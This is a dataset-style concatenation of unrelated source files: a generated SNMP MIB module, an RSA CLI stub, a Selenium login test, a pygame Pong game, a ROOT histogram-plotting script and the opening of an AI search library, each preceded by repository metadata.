etsysIetfBridgeMovedAddr = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 11)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qMovedAddrTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBasePortMovedAddrTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeMovedAddr = etsysIetfBridgeMovedAddr.setStatus('current')
etsysIetfBridgeDot1qFdbMovedAddrNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 12)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbMovedAddr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeDot1qFdbMovedAddrNotification = etsysIetfBridgeDot1qFdbMovedAddrNotification.setStatus('current')
etsysIetfBridgeLoopProtect = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 13)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortCistEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectEventThreshold"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectEventWindow"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeLoopProtect = etsysIetfBridgeLoopProtect.setStatus('current')
etsysIetfBridgeLoopProtectNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 14)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dCistLoopProtectEvent"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeLoopProtectNotification = etsysIetfBridgeLoopProtectNotification.setStatus('current')
etsysIetfBridgeStpCistNonForwardingReason = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 15)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortCistNonForwardingReason"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeStpCistNonForwardingReason = etsysIetfBridgeStpCistNonForwardingReason.setStatus('current')
etsysIetfBridgeStaticUcastAsMcast = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 16)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qStaticUcastAsMcast"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeStaticUcastAsMcast = etsysIetfBridgeStaticUcastAsMcast.setStatus('current')
etsysIetfBridgeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 2, 1)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStpPort"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStpTrap"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeBase"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbNewAddrNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeSpanGuard"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeSpanGuardNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeBackupRoot"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeBackupRootNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBridgePriority"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgePortCistRoleValue"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeMovedAddr"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbMovedAddrNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeLoopProtect"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeLoopProtectNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStpCistNonForwardingReason"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeCompliance = etsysIetfBridgeCompliance.setStatus('current')
etsysIetfBridgeStaticUcastAsMcastCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 2, 2)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStaticUcastAsMcast"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
etsysIetfBridgeStaticUcastAsMcastCompliance = etsysIetfBridgeStaticUcastAsMcastCompliance.setStatus('current')
mibBuilder.exportSymbols("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", etsysIetfBridgeDot1dBase=etsysIetfBridgeDot1dBase, etsysIetfBridgeDot1dStpTopChangeTrapEnable=etsysIetfBridgeDot1dStpTopChangeTrapEnable, etsysIetfBridgeDot1dStpPortStpEnable=etsysIetfBridgeDot1dStpPortStpEnable, etsysIetfBridgeDot1qFdbMovedAddrNotification=etsysIetfBridgeDot1qFdbMovedAddrNotification, etsysIetfBridgeDot1dStp=etsysIetfBridgeDot1dStp, etsysIetfBridgeDot1dSpanGuard=etsysIetfBridgeDot1dSpanGuard, etsysIetfBridgeDot1dBackupRoot=etsysIetfBridgeDot1dBackupRoot, etsysIetfBridgeDot1dStpPortTable=etsysIetfBridgeDot1dStpPortTable, etsysIetfBridgeSpanGuardNotification=etsysIetfBridgeSpanGuardNotification, etsysIetfBridgeGroups=etsysIetfBridgeGroups, etsysIetfBridgeDot1qFdbNewAddrNotification=etsysIetfBridgeDot1qFdbNewAddrNotification, etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable=etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable, etsysIetfBridgeDot1qFdbMovedAddr=etsysIetfBridgeDot1qFdbMovedAddr, etsysIetfBridgeDot1qMovedAddrTrapEnable=etsysIetfBridgeDot1qMovedAddrTrapEnable, etsysIetfBridgeLoopProtect=etsysIetfBridgeLoopProtect, etsysIetfBridgeMibExtMIB=etsysIetfBridgeMibExtMIB, etsysIetfBridgeStpCistNonForwardingReason=etsysIetfBridgeStpCistNonForwardingReason, etsysIetfBridgeDot1dBasePortTable=etsysIetfBridgeDot1dBasePortTable, etsysIetfBridgeSpanGuard=etsysIetfBridgeSpanGuard, etsysIetfBridgeCompliances=etsysIetfBridgeCompliances, etsysIetfBridgeDot1dBasePortMovedAddrTrap=etsysIetfBridgeDot1dBasePortMovedAddrTrap, etsysIetfBridgeDot1dStpNewRootTrapEnable=etsysIetfBridgeDot1dStpNewRootTrapEnable, etsysIetfBridgeDot1dStpLoopProtectPortTable=etsysIetfBridgeDot1dStpLoopProtectPortTable, etsysIetfBridgePortCistRoleValue=etsysIetfBridgePortCistRoleValue, etsysIetfBridgeLoopProtectNotification=etsysIetfBridgeLoopProtectNotification, etsysIetfBridgeBackupRoot=etsysIetfBridgeBackupRoot, PYSNMP_MODULE_ID=etsysIetfBridgeMibExtMIB, etsysIetfBridgeMibExt=etsysIetfBridgeMibExt, etsysIetfBridgeDot1dStpBackupRootEnable=etsysIetfBridgeDot1dStpBackupRootEnable, etsysIetfBridgeDot1dStpLoopProtectPortCistEnable=etsysIetfBridgeDot1dStpLoopProtectPortCistEnable, etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap=etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap, etsysIetfBridgeCompliance=etsysIetfBridgeCompliance, etsysIetfBridgeDot1dStpPortSpanGuardBlocking=etsysIetfBridgeDot1dStpPortSpanGuardBlocking, etsysIetfBridgeDot1dStpSpanGuardEnable=etsysIetfBridgeDot1dStpSpanGuardEnable, etsysIetfBridgeDot1dSpanGuardPortBlocked=etsysIetfBridgeDot1dSpanGuardPortBlocked, etsysIetfBridgeStaticUcastAsMcast=etsysIetfBridgeStaticUcastAsMcast, etsysIetfBridgeStpPort=etsysIetfBridgeStpPort, etsysIetfBridgeDot1dStpBackupRootTrapEnable=etsysIetfBridgeDot1dStpBackupRootTrapEnable, etsysIetfBridgeDot1dCistLoopProtectEvent=etsysIetfBridgeDot1dCistLoopProtectEvent, etsysIetfBridgeBase=etsysIetfBridgeBase, etsysIetfBridgeDot1dStpLoopProtectEventThreshold=etsysIetfBridgeDot1dStpLoopProtectEventThreshold, etsysIetfBridgeDot1qFdbNewLearnedAddr=etsysIetfBridgeDot1qFdbNewLearnedAddr, etsysIetfBridgeDot1dStpSpanGuardTrapEnable=etsysIetfBridgeDot1dStpSpanGuardTrapEnable, etsysIetfBridgeDot1dStpLoopProtectEventWindow=etsysIetfBridgeDot1dStpLoopProtectEventWindow, etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking=etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking, etsysIetfBridgeStaticUcastAsMcastCompliance=etsysIetfBridgeStaticUcastAsMcastCompliance, etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable=etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable, etsysIetfBridgeStpTrap=etsysIetfBridgeStpTrap, etsysIetfBridgeConformance=etsysIetfBridgeConformance, etsysIetfBridgeMovedAddr=etsysIetfBridgeMovedAddr, etsysIetfBridgeDot1Notifications=etsysIetfBridgeDot1Notifications, etsysIetfBridgeDot1dStpPortEntry=etsysIetfBridgeDot1dStpPortEntry, etsysIetfBridgeDot1qBase=etsysIetfBridgeDot1qBase, etsysIetfBridgeDot1dStpLoopProtectPortEntry=etsysIetfBridgeDot1dStpLoopProtectPortEntry, etsysIetfBridgeDot1dStpPortCistRoleValue=etsysIetfBridgeDot1dStpPortCistRoleValue, etsysIetfBridgeDot1dStpPortCistNonForwardingReason=etsysIetfBridgeDot1dStpPortCistNonForwardingReason, etsysIetfBridgeDot1dStpSpanGuardBlockTime=etsysIetfBridgeDot1dStpSpanGuardBlockTime, etsysIetfBridgeBackupRootNotification=etsysIetfBridgeBackupRootNotification, etsysIetfBridgeDot1dStpBridgePriorityDefault=etsysIetfBridgeDot1dStpBridgePriorityDefault, etsysIetfBridgeDot1dLoopProtect=etsysIetfBridgeDot1dLoopProtect, etsysIetfBridgeDot1qNewLearnedAddrTrapEnable=etsysIetfBridgeDot1qNewLearnedAddrTrapEnable, etsysIetfBridgeDot1dBasePortEntry=etsysIetfBridgeDot1dBasePortEntry, etsysIetfBridgeDot1dStpBridgePriority=etsysIetfBridgeDot1dStpBridgePriority, etsysIetfBridgeDot1qStaticUcastAsMcast=etsysIetfBridgeDot1qStaticUcastAsMcast, etsysIetfBridgeDot1dBackupRootActivation=etsysIetfBridgeDot1dBackupRootActivation)
|
[
"dcwangmit01@gmail.com"
] |
dcwangmit01@gmail.com
|
65a771ca99989d98e565f0ae2822d9a4524fbfd5
|
d43bc1e7f8ae583f0cb187cc174b28dca31da11d
|
/venv3/bin/pyrsa-decrypt
|
d268eb316a19fbcd931f698719055b9377188ead
|
[] |
no_license
|
akashshinde/cmd-line-e2e-tests
|
b19d04798b439e59ea47cc9d19bdd6840dcbaa84
|
3d8ac054bd9304bb6675ac208125996e94ac0feb
|
refs/heads/master
| 2020-07-26T15:30:08.899585
| 2019-09-16T02:18:54
| 2019-09-16T02:18:54
| 208,691,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 250
|
#!/Users/akash/Downloads/boilerplate/venv3/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rsa.cli import decrypt
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(decrypt())
|
[
"akashshinde159@gmail.com"
] |
akashshinde159@gmail.com
|
|
98c74234ac1ebabd1332865d2ad01b254378827a
|
dee52aecc2801e43c5937c13ce525ba6ba283859
|
/employeesSignIn.py
|
2b57dba5d836f2b720a6c98671886e01053dcb77
|
[] |
no_license
|
QurashiQA/FirstTest
|
80f4c94dcf3c703d7713dce26a7d71c0b7e43365
|
4d7595ee5f70d30d9ea230218ee6e52b0a0a7073
|
refs/heads/master
| 2020-12-02T07:42:34.658360
| 2017-07-09T23:25:02
| 2017-07-09T23:25:02
| 96,715,189
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,100
|
py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import selenium
Dtech = webdriver.Firefox()
Dtech.get("http://www.dareebatech.com")
failuer = []
def employeeSignInPageLoading ():
result = Dtech.find_element_by_css_selector("a.btn:nth-child(3)")
result.click()
try:
assert "dareebatech.com/individual/login" in Dtech.current_url
except:
failuer.append("error 1")
if failuer.__len__() >1:
print (failuer)
else:
print ("No Errors")
def employeeLogInEmail():
email = Dtech.find_element_by_id("email")
email.send_keys("qurshi@qurshi.com")
password = Dtech.find_element_by_id("password")
password.send_keys("this is my password")
enter = Dtech.find_element_by_css_selector(".btn")
enter.click()
try:
assert ("incorrect" in source == True)
except:
failuer.append("error 2")
employeeSignInPageLoading()
employeeLogInEmail()
print (failuer)
source =[""]
source.append(Dtech.page_source)
Dtech.close()
|
[
"C:\\Users\\q\\AppData\\Roaming\\The Bat!"
] |
C:\Users\q\AppData\Roaming\The Bat!
|
1e2f6a0b6cd31ddb5d275c86722270db9afa02be
|
fdcfd3b0cf266b6327d800c6a861f6071700510e
|
/pong.py
|
52e53b05352a7fb024c245ef3fb3695f73739893
|
[] |
no_license
|
kavinbharathii/pong_pygame
|
c7ae8e536bad400f60e7e9be2ba7a65a077fbb9c
|
514cb44d0aaeb0952279f42eb66ae20b5bc72e74
|
refs/heads/main
| 2023-01-08T01:40:09.185463
| 2020-11-06T10:06:26
| 2020-11-06T10:06:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,178
|
py
|
import pygame
WIDTH = 720
HEIGHT = 560
display = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('Pong')
frame_rate = 90
pong = pygame.Rect((WIDTH // 2) - 10, (HEIGHT // 2) - 10, 20, 20)
player = pygame.Rect(WIDTH - 20, HEIGHT // 2 - 45, 10, 90)
opponent = pygame.Rect(10, HEIGHT // 2 - 45, 10, 90)
pong_x = 3
pong_y = 3
player_vel = 5
opponent_vel = 5
bgcolor = pygame.Color('grey12')
light_grey = (200, 200, 200)
def pong_physics():
global pong_x, pong_y
pong.x += pong_x
pong.y += pong_y
if pong.x <= 0 or pong.x >= WIDTH - 15:
pong.x, pong.y = (WIDTH // 2) - 15, (HEIGHT // 2) - 10
if pong.y <= 0 or pong.y >= HEIGHT - 15:
pong_y *= -1
if pong.colliderect(player) or pong.colliderect(opponent):
pong_x *= -1
def main():
global pong_x, pong_y, player_vel
run = True
clock = pygame.time.Clock()
while run:
display.fill(bgcolor)
clock.tick(frame_rate)
keys = pygame.key.get_pressed()
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if keys[pygame.K_UP]:
player.y -= player_vel
if player.y <= 0:
player.y = 5
if keys[pygame.K_DOWN]:
player.y += player_vel
if player.y + player.height >= HEIGHT:
player.y = HEIGHT - player.height- 5
if opponent.y < pong.y:
opponent.y += opponent_vel
if opponent.y > pong.y:
opponent.y -= opponent_vel
if opponent.y <= 0:
opponent.y = 5
if opponent.y + opponent.height >= HEIGHT:
opponent.y = HEIGHT - opponent.height - 5
pong_physics()
pygame.draw.line(display, light_grey, (WIDTH // 2, 0),
(WIDTH // 2, HEIGHT))
pygame.draw.rect(display, light_grey, player)
pygame.draw.rect(display, light_grey, opponent)
pygame.draw.ellipse(display, light_grey, pong)
pygame.display.flip()
if __name__ == '__main__':
main()
|
[
"noreply@github.com"
] |
kavinbharathii.noreply@github.com
|
adf8ed52a68df9b5f6007f0197fd015a3c5decb0
|
12cee1912bed05e648b29e51f9f424b56fb9f9a5
|
/TrackAnalyzer/test/makePlots.py
|
1744820df2cc9f548da6e556cc3e92d42ecbe69d
|
[] |
no_license
|
mhwalker/MWalker
|
2a3ad48079d46ee4bb021fe83c4fbd66e2dfe9a8
|
4cf5dd485e67d0ef7eb714a7b03696ff59edc970
|
refs/heads/master
| 2021-01-18T23:26:53.931098
| 2016-07-14T19:41:24
| 2016-07-14T19:41:24
| 19,110,312
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,876
|
py
|
from ROOT import *
gROOT.SetStyle("Plain")
gStyle.SetPalette(1)
#gROOT.SetOptStat(0)
f = TFile("trackAnalyzerOut.root")
d_eta = f.Get("duplicate_eta")
d_pdR = f.Get("duplicate_pdR")
d_vdR = f.Get("duplicate_vdR")
d_bestdR = f.Get("duplicate_bestdR")
d_minDelta = f.Get("duplicate_minDelta")
d_mPT = f.Get("duplicate_matchedPerTrack")
d_dpT = f.Get("duplicate_deltapT")
d_nHits = f.Get("duplicate_nSharedHits")
d_innerR = f.Get("duplicate_innerR")
d_outerR = f.Get("duplicate_outerR")
d_nHits2 = f.Get("duplicate_nHits")
d_pT = f.Get("duplicate_pT")
d_R = f.Get("duplicate_deltaR")
d_nMissingHits = f.Get("duplicate_nMissingHits")
d2_q = f.Get("duplicate_qoverp")
d2_l = f.Get("duplicate_lambda")
d2_p = f.Get("duplicate_phi")
d2_x = f.Get("duplicate_dxy")
d2_z = f.Get("duplicate_dsz")
c2_q = f.Get("comb_qoverp")
c2_l = f.Get("comb_lambda")
c2_p = f.Get("comb_phi")
c2_x = f.Get("comb_dxy")
c2_z = f.Get("comb_dsz")
c = TCanvas("c","",800,600)
c.SetLogy()
d_eta.SetXTitle("#eta of sim tracks")
d_eta.Draw()
c.SaveAs("eta.eps")
c.Clear()
d_nHits.SetXTitle("number of shared hits")
d_nHits.Draw()
c.SaveAs("nSharedHits.eps")
c.Clear()
d_minDelta.GetXaxis().SetRangeUser(0,50)
d_minDelta.SetXTitle("#Delta x inner to outer")
d_minDelta.Draw()
c.SaveAs("minDelta.eps")
c.Clear()
d_dpT.SetXTitle("(p_{T1} - p_{T2})/p_{T1}")
d_dpT.Draw()
c.SaveAs("dpT.eps")
c.Clear()
d_mPT.SetXTitle("N matched reco tracks to a sim track")
d_mPT.Draw()
c.SaveAs("matchedTracks.eps")
c.Clear()
d_bestdR.SetXTitle("#Delta R inner to outer")
d_bestdR.Draw()
c.SaveAs("bestdR.eps")
c.Clear()
c.SetLogy(0)
d_innerR.SetXTitle("innerPosition Radius")
d_innerR.SetYTitle("innerPosition Radius")
d_innerR.Draw("colz")
c.SaveAs("innerR.eps")
c.Clear()
d_outerR.SetXTitle("outerPosition Radius")
d_outerR.SetYTitle("outerPosition Radius")
d_outerR.Draw("colz")
c.SaveAs("outerR.eps")
c.Clear()
d_nHits2.SetXTitle("nHits")
d_nHits2.SetYTitle("nHits")
d_nHits2.Draw("colz")
c.SaveAs("nHits.eps")
c.Clear()
d_nMissingHits.SetXTitle("nMissingHits")
d_nMissingHits.SetYTitle("nMissingHits")
d_nMissingHits.Draw("colz")
c.SaveAs("nMissingHits.eps")
c.Clear()
d_pT.SetXTitle("innerMomentum pT")
d_pT.SetYTitle("innerMomentum pT")
d_pT.Draw("colz")
c.SaveAs("pT2d.eps")
c.Clear()
d_R.SetXTitle("deltaR inner to outer")
d_R.Draw()
c.SaveAs("deltaR.eps")
c.Clear()
d2_q.SetXTitle("q over p")
d2_q.SetYTitle("q over p")
d2_q.Draw("colz")
c.SaveAs("duplicate_qoverp2d.eps")
c.Clear()
d2_l.SetXTitle("lambda")
d2_l.SetYTitle("lambda")
d2_l.Draw("colz")
c.SaveAs("duplicate_lambda2d.eps")
c.Clear()
d2_p.SetXTitle("phi")
d2_p.SetYTitle("phi")
d2_p.Draw("colz")
c.SaveAs("duplicate_phi2d.eps")
c.Clear()
d2_x.SetXTitle("dxy")
d2_x.SetYTitle("dxy")
d2_x.Draw("colz")
c.SaveAs("duplicate_dxy2d.eps")
c.Clear()
d2_z.SetXTitle("dsz")
d2_z.SetYTitle("dsz")
d2_z.Draw("colz")
c.SaveAs("duplicate_dsz2d.eps")
c.Clear()
c2_q.SetXTitle("q over p")
c2_q.SetYTitle("q over p")
c2_q.Draw("colz")
c.SaveAs("comb_qoverp2d.eps")
c.Clear()
c2_l.SetXTitle("lambda")
c2_l.SetYTitle("lambda")
c2_l.Draw("colz")
c.SaveAs("comb_lambda2d.eps")
c.Clear()
c2_p.SetXTitle("phi")
c2_p.SetYTitle("phi")
c2_p.Draw("colz")
c.SaveAs("comb_phi2d.eps")
c.Clear()
c2_x.SetXTitle("dxy")
c2_x.SetYTitle("dxy")
c2_x.Draw("colz")
c.SaveAs("comb_dxy2d.eps")
c.Clear()
c2_z.SetXTitle("dsz")
c2_z.SetYTitle("dsz")
c2_z.Draw("colz")
c.SaveAs("comb_dsz2d.eps")
c.Clear()
comparisons = ['dqoverp','dlambda','dphi','ddxy','ddsz','bestdR','chi2','pcaR']
for co in comparisons:
m = f.Get("duplicate_"+co)
u = f.Get("comb_"+co)
u.SetXTitle(co)
u.GetYaxis().SetRangeUser(0,u.GetMaximum()*1.1)
u.SetLineColor(kBlack)
m.Scale(40)
m.SetLineColor(kRed)
c.SetLogy(0)
if co == 'bestdR' or co == 'chi2' or co == 'pcaR':
u.GetYaxis().SetRangeUser(0.1,u.GetMaximum()*5)
c.SetLogy()
u.Draw()
m.Draw("same")
leg = TLegend(0.6,0.5,0.85,0.85)
leg.AddEntry(u,"combinatorics","l")
leg.AddEntry(m,"duplicates X40","l")
leg.SetFillColor(kWhite)
leg.Draw()
c.SaveAs(co+".eps")
c.Clear()
cuthistos = ['cut0_pcaR','cut1_dphi','cut2_ddsz','cut3_dlambda','cut4_ddxy','cut5_innerR']
dupcut = []
comcut = []
ratios = []
dupcut.append(f.Get("duplicate_dqoverp"))
comcut.append(f.Get("comb_dqoverp"))
for ch in cuthistos:
dd = f.Get("duplicate_"+ch)
cc = f.Get("comb_"+ch)
dd.SetDirectory(0)
dupcut.append(dd)
comcut.append(cc)
c.Clear()
c.SetLogy()
comcut[0].SetLineColor(kRed)
dupcut[0].SetLineColor(kRed)
comcut[0].GetYaxis().SetRangeUser(0.1,5*comcut[0].GetMaximum())
dupcut[0].GetYaxis().SetRangeUser(0.1,5*dupcut[0].GetMaximum())
comcut[0].SetXTitle("q / p")
dupcut[0].SetXTitle("q / p")
dupcut[0].Scale(1./40.)
print dupcut[0].GetEntries(),dupcut[1].GetEntries()
leg1 = TLegend(0.6,0.5,0.88,0.85)
leg1.SetFillColor(kWhite)
leg1.AddEntry(comcut[0],"no cuts","l")
comcut[0].Draw()
ct = comcut[0].GetEntries()
for k,v in enumerate(comcut):
print v.GetEntries()/ct
if k != 0:
v.SetLineColor(kBlue+k-3)
leg1.AddEntry(v,cuthistos[k-1],"l")
v.Draw("same")
leg1.Draw()
c.SaveAs("comb_cutFlow.eps")
c.Clear()
dupcut[0].Draw()
dt = dupcut[0].GetEntries()
for k,v in enumerate(dupcut):
print v.GetEntries()/dt
if k == 0:
v.Draw()
if k != 0:
v.SetLineColor(kBlue+k-3)
v.Draw("same")
leg1.Draw()
c.SaveAs("dup_cutFlow.eps")
for k,v in enumerate(dupcut):
r = v.Clone("r"+str(k))
print k,v.GetName(),r.GetName(),v.GetEntries(),r.GetEntries()
r.SetDirectory(0)
r.Divide(comcut[k])
r.SetLineWidth(2)
#if k == 0: r.Draw()
ratios.append(r)
ratios[0].SetLineColor(kRed)
ratios[0].Draw()
ratios[0].GetYaxis().SetRangeUser(1e-5,10.0)
for k,r in enumerate(ratios):
r.Draw("same")
leg1.Draw()
c.SaveAs("cutFlow.eps")
c.Clear()
c5 = TCanvas("c5","",1000,600)
c5.Divide(3,2)
|
[
"mwalker@physics.rutgers.edu"
] |
mwalker@physics.rutgers.edu
|
b36d283c557e9b5a5197b3e3541c79aeba07b8f3
|
42908ab1561e43edd9cca0d9347f34ab67170b48
|
/search.py
|
bda1eaad1243ce1e15d2f7822c32884b6df4897b
|
[] |
no_license
|
PATX0/SolitaireGame
|
9931a88664b7e46de5595b4ac0d35ad96d68ec7f
|
052dc8da4c73ae2cbcb39e39c7f9221ea635c1ad
|
refs/heads/master
| 2020-03-30T17:10:07.390291
| 2018-10-26T18:40:49
| 2018-10-26T18:40:49
| 151,444,050
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46,738
|
py
|
"""Search (Chapters 3-4)
The way to use this code is to subclass Problem to create a class of problems,
then create problem instances and solve them with calls to the various search
functions."""
from utils import (
is_in, argmin, argmax, argmax_random_tie, probability, weighted_sampler,
memoize, print_table, open_data, Stack, FIFOQueue, PriorityQueue, name,
distance
)
from collections import defaultdict
import math
import random
import sys
import bisect
infinity = float('inf')
# ______________________________________________________________________________
class Problem(object):
"""The abstract class for a formal problem. You should subclass
this and implement the methods actions and result, and possibly
__init__, goal_test, and path_cost. Then you will create instances
of your subclass and solve them with the various search functions."""
def __init__(self, initial, goal=None):
"""The constructor specifies the initial state, and possibly a goal
state, if there is a unique goal. Your subclass's constructor can add
other arguments."""
self.initial = initial
self.goal = goal
def actions(self, state):
"""Return the actions that can be executed in the given
state. The result would typically be a list, but if there are
many actions, consider yielding them one at a time in an
iterator, rather than building them all at once."""
raise NotImplementedError
def result(self, state, action):
"""Return the state that results from executing the given
action in the given state. The action must be one of
self.actions(state)."""
raise NotImplementedError
def goal_test(self, state):
"""Return True if the state is a goal. The default method compares the
state to self.goal or checks for state in self.goal if it is a
list, as specified in the constructor. Override this method if
checking against a single self.goal is not enough."""
if isinstance(self.goal, list):
return is_in(state, self.goal)
else:
return state == self.goal
def path_cost(self, c, state1, action, state2):
"""Return the cost of a solution path that arrives at state2 from
state1 via action, assuming cost c to get up to state1. If the problem
is such that the path doesn't matter, this function will only look at
state2. If the path does matter, it will consider c and maybe state1
and action. The default method costs 1 for every step in the path."""
return c + 1
def value(self, state):
"""For optimization problems, each state has a value. Hill-climbing
and related algorithms try to maximize this value."""
raise NotImplementedError
# ______________________________________________________________________________
class Node:
"""A node in a search tree. Contains a pointer to the parent (the node
that this is a successor of) and to the actual state for this node. Note
that if a state is arrived at by two paths, then there are two nodes with
the same state. Also includes the action that got us to this state, and
the total path_cost (also known as g) to reach the node. Other functions
may add an f and h value; see best_first_graph_search and astar_search for
an explanation of how the f and h values are handled. You will not need to
subclass this class."""
def __init__(self, state, parent=None, action=None, path_cost=0):
"""Create a search tree Node, derived from a parent by an action."""
self.state = state
self.parent = parent
self.action = action
self.path_cost = path_cost
self.depth = 0
if parent:
self.depth = parent.depth + 1
def __repr__(self):
return "<Node {}>".format(self.state)
def __lt__(self, node):
return self.state < node.state
def expand(self, problem):
"""List the nodes reachable in one step from this node."""
return [self.child_node(problem, action)
for action in problem.actions(self.state)]
def child_node(self, problem, action):
"""[Figure 3.10]"""
next = problem.result(self.state, action)
return Node(next, self, action,
problem.path_cost(self.path_cost, self.state,
action, next))
def solution(self):
"""Return the sequence of actions to go from the root to this node."""
return [node.action for node in self.path()[1:]]
def path(self):
"""Return a list of nodes forming the path from the root to this node."""
node, path_back = self, []
while node:
path_back.append(node)
node = node.parent
return list(reversed(path_back))
# We want for a queue of nodes in breadth_first_search or
# astar_search to have no duplicated states, so we treat nodes
# with the same state as equal. [Problem: this may not be what you
# want in other contexts.]
def __eq__(self, other):
return isinstance(other, Node) and self.state == other.state
def __hash__(self):
return hash(self.state)
# ______________________________________________________________________________
class SimpleProblemSolvingAgentProgram:
"""Abstract framework for a problem-solving agent. [Figure 3.1]"""
def __init__(self, initial_state=None):
"""State is an sbstract representation of the state
of the world, and seq is the list of actions required
to get to a particular state from the initial state(root)."""
self.state = initial_state
self.seq = []
def __call__(self, percept):
"""[Figure 3.1] Formulate a goal and problem, then
search for a sequence of actions to solve it."""
self.state = self.update_state(self.state, percept)
if not self.seq:
goal = self.formulate_goal(self.state)
problem = self.formulate_problem(self.state, goal)
self.seq = self.search(problem)
if not self.seq:
return None
return self.seq.pop(0)
def update_state(self, percept):
raise NotImplementedError
def formulate_goal(self, state):
raise NotImplementedError
def formulate_problem(self, state, goal):
raise NotImplementedError
def search(self, problem):
raise NotImplementedError
# ______________________________________________________________________________
# Uninformed Search algorithms
def tree_search(problem, frontier):
"""Search through the successors of a problem to find a goal.
The argument frontier should be an empty queue.
Don't worry about repeated paths to a state. [Figure 3.7]"""
frontier.append(Node(problem.initial))
while frontier:
node = frontier.pop()
if problem.goal_test(node.state):
return node
frontier.extend(node.expand(problem))
return None
def graph_search(problem, frontier):
"""Search through the successors of a problem to find a goal.
The argument frontier should be an empty queue.
If two paths reach a state, only use the first one. [Figure 3.7]"""
frontier.append(Node(problem.initial))
explored = set()
while frontier:
node = frontier.pop()
